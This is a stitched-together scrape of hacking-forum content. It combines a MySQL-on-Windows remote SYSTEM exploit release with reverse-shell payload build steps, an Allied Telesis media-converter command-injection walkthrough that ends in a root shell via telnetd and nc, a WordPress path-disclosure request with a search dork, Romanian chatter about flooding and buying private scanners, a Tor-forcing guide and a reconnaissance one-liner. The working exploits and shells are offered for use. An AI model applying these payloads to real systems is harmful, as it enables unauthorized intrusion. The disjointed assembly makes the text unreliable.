wind

*** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owned By Kingcope http://www.exploit-db.com/sploits/23073.tar.gz Installation Instructions ============================= 1. Install mysql client libraries and headers (UNIX) RedHat based (e.g. CentOS): yum install mysql mysql-devel 2. Compile the standalone exploit issue commands: gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient 3. Compile the reverse shell payload (this is required!) required because the connect back ip and port are hardcoded in the dll: use mingw on windows or wine change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443). issue commands: set PATH=%PATH%;c:\MinGW\bin\ gcc -c payload.c gcc -shared -o payload.dll payload.o -lws2_32 copy the payload.dll into the mysqljackpot exploit folder 4. Run The Exploit ./mysqljackpot -u root -p "" -t 99.99.99.99 A valid database admin user and his password are required for the exploit to work properly. This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package. Be sure to have the firewall open on the desired reverse port on the attacking machine. 5. Enjoy your SYSTEM Shell!!! Yours Sincerely, -- Kingcope

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2013-01-02 ] #################################################################### # [ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access # #################################################################### # # Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis. # With the AT-MCF2000M management module, if there is a blade failure, # insertion or removal, your traffic flow will not be interupted.." # # Vendor: http://www.alliedtelesis.com/ # Product: http://www.alliedtelesis.com/p-2265.html # Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP # ################################################################### # Vulnerability: Logging in system via ssh/telnet, is necessary to using this vulnerability. After logging in, user has access to client menu(/sbin/AtiCli), without access to the shell. User-supplied data are not validated properly. In section "File Show Filesystem=system://0/m/", is possible to inject command with using special characters: "|;&. Commands are limited to max 25 characters. Chars / are filtered. For example: # File Show Filesystem=system://0/m/";echo 11111111111111111111" File name can be only up to 25 alphanumeric characters. <>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002] # # File Show Filesystem=system://0/m/";ls -al /" <>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002] Getting root access: root@debian:~# ssh 10.11.200.2 -------------------------------------------------------------------------------- Allied Telesis Media Converter AT-MCF2000 -------------------------------------------------------------------------------- Login: manager Password: ******* Allied Telesis Media Converter - Version 3.0.2 <No System Name> # ? COnfiguration - Configuration related commands DIagnostics - Diagnostics related commands File - File related commands IP - IP related commands Logging - Logging related commands Ntp - Ntp related commands Ping - Ping a host System - System related commands Telnet - Telnet related commands SNMP - Snmp related commands SSh - SSH related commands User - User management commands CLear - Clear the terminal screen Help - CLI help information EXit - Exit # File Show Filesystem=system://0/m/ Module 0/M File System: -rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg -rw-r--r-- 1 0 0 2612 Jan 1 15:27 BM_0_2.cfg -rw-r--r-- 1 0 0 1355 Jan 1 15:27 MM.cfg -rw-r--r-- 1 0 0 310 Dec 31 13:17 file.inf -rw-r--r-- 1 0 0 6609 Jan 1 15:27 mcf_chassis0.cfg # File Show Filesystem=system://0/m/BM_0_1.cfg Module 0/M File System: -rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg # File Show Filesystem=system://0/m/test Module 0/M File System: ls: test: No such file or directory <>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052] # File Show Filesystem=system://0/m/|id Module 0/M File System: uid=0 gid=0 # File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30" Module 0/M File System: <>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061] # File Show Filesystem=system://0/m/|"ps aux|grep telnet" Module 0/M File System: 25 0 336 S /usr/sbin/telnetd -l /sbin/AtiCli 497 0 192 S telnetd -l/bin/sh -p30 <>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117] # exit <>19:01:40::exit::COMPL::[00.001] # logging out. Connection to 10.11.200.2 closed. root@debian:~# nc 10.11.200.2 30 BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. / # id uid=0 gid=0 / # uname -a Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown / # cat /proc/version Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009 / # ls -al drwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 . drwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 .. -rw-r--r-- 1 0 0 125 Jan 1 19:10 .ash_history -rw-r--r-- 1 0 0 0 Jan 1 13:24 1 drwxr-xr-x 2 0 0 1024 Aug 10 2009 bin drwxr-xr-x 3 0 0 0 Jan 1 15:27 cfg drwxr-xr-x 4 0 0 2048 Aug 10 2009 dev drwxr-xr-x 10 0 0 1024 Jan 1 1970 etc drwxr-xr-x 4 0 0 1024 Aug 10 2009 lib drwxr-xr-x 2 0 0 12288 Aug 10 2009 lost+found drwxr-xr-x 3 0 0 1024 Aug 10 2009 mnt dr-xr-xr-x 49 0 0 0 Jan 1 1970 proc drwx------ 2 0 0 1024 Aug 10 2009 root drwxr-xr-x 2 0 0 1024 Aug 10 2009 sbin drwxrwxrwt 2 0 0 1024 Jan 1 19:06 tmp drwxr-xr-x 6 0 0 1024 Aug 10 2009 usr drwxr-xr-x 7 0 0 1024 Jan 1 1970 var / # echo pwnd! & exit pwnd! Connection closed by foreign host. root@debian:~#

Iceman e varza, va zic eu, il cunosc personal , a avut bulan + multa pierdere de timp pe net, nu dormea noptile, rupea scanu .. deci .. fuckoff cu el.

Pe iceman il vad cam des live, acum si la tv .

Cum l-ai putea folosi ? si notificarile sa-ti apara in dreapta sus ? mie imi apar in stanga ..

Site de torrente ? sau ce e ?

+rep, il caut de ceva timp.

Eu am nevoie.

Salut, stie careva daca este ceva exploit pt. servere sa:mp ?

La multi ani !

Bun, va multumesc ..

Salut, ce antivirus imi recomandati intre eset si avira ? Nu am un pc atat de bun, e vai mortii lui .. pana acum am folosit nod32 .. dar suge multe resurse ..

Nici sa copiezi nu stii, nu esti destul de 'bandit' .. oricum, nu te lauda nimeni pt. plagiat, incearca sa faci un lucru mic, dar macar e facut de tine .

Depinde ce banda are, nu are rost sa floodezi daca are banda slaba, n-o sa pice ip-u floodat.

Salut, am nevoie de o invitatie, aveti careva sa-mi dati ?

# Exploit Title: WordPress 3.5 Path Disclosure Vulnerability # Date: 01/19/2013 # Google Dork: intext:"powered by WordPress" # Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-3.5.txt # Vendor Homepage: http://wordpress.org/ # Software Link: http://wordpress.org/latest.zip # Version: 3.5 and probably prior # Tested on: Windows Description: Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the WordPress installation. Proof of Concept: -------------------------------------- POST /wordpress/wp-includes/js/tinymce/plugins/spellchecker/rpc.php HTTP/1.1 Content-Length: 22 Content-Type: application/x-www-form-urlencoded Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* json_data[$hack]=1 -------------------------------------- Done! Proof: http://goo.gl/PPhWf

Nu-s bune, nu va chinuiti.

fuckin' google

Am eu de vnc, ai tu ceva privat pt. root-uri ? gen plesk-u asta nou

I have STMP scanner, it's private for sale ! PM me ..

E cam varza, am facut si eu un mass ..

L-a incercat careva ?

#!/usr/bin/perl ######################################## #Perl Random Hostname Generator # # Files Modified: # /etc/hostname # /proc/sys/kernel/hostname # # A SoldierX utility by EverestX ######################################## print "****Hostname Generator****\n"; print " A SoldierX Utility\n\n"; if ($#ARGV !=) { #This Section generates a 5 char alphanumeric value $host = rand_host(); sub rand_host { my @chars = ('a'..'z','0'..'9'); my $len = 4; $host = ''; for (..$len) { $host .= $chars[int rand @chars]; } # This Section generates the 1st Letter $letter = rand_letter(); sub rand_letter{ my @chars = ( 'A'..'Z'); my $length = ; $letter = ''; for (..$length){ $letter .= $chars[int rand @chars]; } #Combine the 1st letter & other 5 digits. $hostname = $letter.$host; print " Random hostname set to: $hostname \n"; #Change the host files open (FILE1, '>/etc/hostname'); print FILE1 "$hostname"; close (FILE1); open (FILE2, '>/proc/sys/kernel/hostname'); print FILE2 "$hostname"; close (FILE2); } } }

1 Windows Box (tested using XP sp3) Internet Connection Time to test and verify traffic Advanced Onion Router | Free Security & Utilities software downloads at SourceForge.net Actually toring your Windows traffic --------------------------------------------- I've come to find out that Tor+Vidalia+Privoxy bundle for Windows doesn't really work for much other than Firefox. Given the fact you're browsing the Site, chances are you need more than *just* HTTP over TOR. While I don't recommend Windows as a Pentest Platform, there are some fantastic tools such as Oxid's Cain and Able that are Windows Only. There are cases where apps are windows only, and in these cases you need to TOR your traffic forcibly. I can not guarantee anything will work for you, but it did for me, here's how I did it. Making it happen (with the Cap'n) ----------------------------------------- First Download, extract, and install Advance Tor from the link above at Source Forge. The default setting should work for initially connecting. The default Screen is this: Once connected you'll see this. I can confirm that the configuration is a bit glitchy,TEST THE CONNECTION TO TOR BEFORE SETTINGS MODIFICATION. If you get any errors after making modifications, just extract the zip again and start over. Forcing Apps Over Tor ---------------------------- By default, most apps will not use TOR for the traffic. You will have to "force" it. Unfortunately, some apps and executables have issues with this so IT IS ABSOLUTELY NECESSARY THAT YOU VERIFY YOUR TRAFFIC IS LEAVING OVER THE TOR NETWORK! In this screen shot you can see that I have Forced 7th Sphere (my trusty lightweight scanner) and BL4CK's VNC Viewer over TOR. (Both Work BTW) Checking your shits ------------------------ You need to verify each forced app individually. Also, understand that a lot of time some traffic may be leaked regardless so be just as careful. I recommend using your own gateway or perimeter firewall to verify. This is how I verify my traffic is coming over tor. Additionally, having remote systems to test and verify is even better. whatismyip.org is a strait Text web page that you can test telnet connections to as well as web traffic . As I have mentioned, a lot of apps DO work, some don't CMD for example. **ZENMAP DID NOT WORK IN MY TESTING, you've been Warned, this may be due to my local network but test it** -------------- Cisco and Supgergates pentest app needs to be tested with this method if someone gets a chance before me Reference: The interwebs. Source

cat /proc/cpuinfo ; free -m ; /sbin/ifconfig